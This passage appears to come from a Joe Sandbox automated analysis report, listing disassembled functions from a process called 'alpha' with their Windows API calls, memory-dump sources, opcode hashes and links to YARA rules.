                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2448200120-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 6d57269d6f2d783b0e33b3cb296fe8eadb70ae1a268e1dbc21a504202adeb425
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6212935A18B4687E614BB11AC2427BF6A1FF94B81F894135EA0E07795CF3CE4418B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EC7CF8 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: c05f5a8e4f331155ff3ab3e5f379e70f668a94b4df3bf46be910e9d743e3f00c
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C218865608B45C6EE04BB55AD2007BFBA1FF8ABE0B999130DE1E43795DF3CE4018720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EE10D8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDA6
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF706EBB9A1,?,?,?,?,00007FF706EBD81A), ref: 00007FF706EBCDBD
                                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF706ED827A), ref: 00007FF706EE11DC
                                                                                                                                                                                                                                                                                                                                                                                                                                          • memmove.MSVCRT(?,00000000,00000000,00000000,00000001,0000000A,?,00007FF706ED827A), ref: 00007FF706EE1277
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heap$AllocProcessmemmovewcschr
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1135967885-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 1a8a2c775685e02cf1b2bfab1f3375190b1ad7c956f01dc94337fd03ea84a7f7
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 889ed0e1ac931929da6aa725351c410d7e283b9244a42ae2ffb62b95a24414b6
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8471C775A0874286D760AF15AC606BBF6E4FFA9798FD04235C94D83B94DF3CA4918B20
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED9784 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706ED97D0
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD46E
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF706EBD485
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD4EE
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: iswspace.MSVCRT ref: 00007FF706EBD54D
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD569
                                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00007FF706EBD3F0: wcschr.MSVCRT ref: 00007FF706EBD58C
                                                                                                                                                                                                                                                                                                                                                                                                                                          • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF706ED98D7
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$Heap$AllocCloseOpenProcessiswspace
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: Software\Classes
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2714550308-1656466771
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 0b47ce2809022f3e4184438290ed4214e1da36f9068b7e5ef6b65b67e52e09f9
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eb7f4015b54f8209f821cd25b29d275aeb821b067b2f4fde3e660eb3c9d82795
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E8418E26A09B5281EA00FB16DC6503BA3A4FF84BD0F948231DA5E477E6DF39E856C350
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706EB3BE4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: /-Y
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1886669725-4274875248
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 702dd6039b464f2e69e34c71de8ebe35fefd22f9f6d86ed595bf5c714085f997
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 772bd3782c46842c372c8b89a915565f11f80ecece3792b3c4e3ce842e7c51e5
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E21816AE0876581EB10AB42AD6117BF6A1BF54FC0F949131DE880B794DF3CE482D720
                                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00007FF706ED5FD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000B.00000002.1298291290.00007FF706EB1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF706EB0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298263710.00007FF706EB0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298327861.00007FF706EE2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EED000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EF1000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706EFF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298351192.00007FF706F04000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000B.00000002.1298452353.00007FF706F09000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_7ff706eb0000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Module$FileHandleName
                                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: P<dwj`
                                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4146042529-4006019111
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 9888b8bcc5f4094d9b922c09ff083265bc4cf221ca7ae41e50f70850f082f57d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 9940d995d76de3a5bdfe1e774157f3a46e01ac35a91592b93d6e9298b9f807e0
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9888b8bcc5f4094d9b922c09ff083265bc4cf221ca7ae41e50f70850f082f57d
                                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D219F62A1878696FB716B11AC203BBE790BF59BE4FCC5231DB5E066C5EF2DD4018620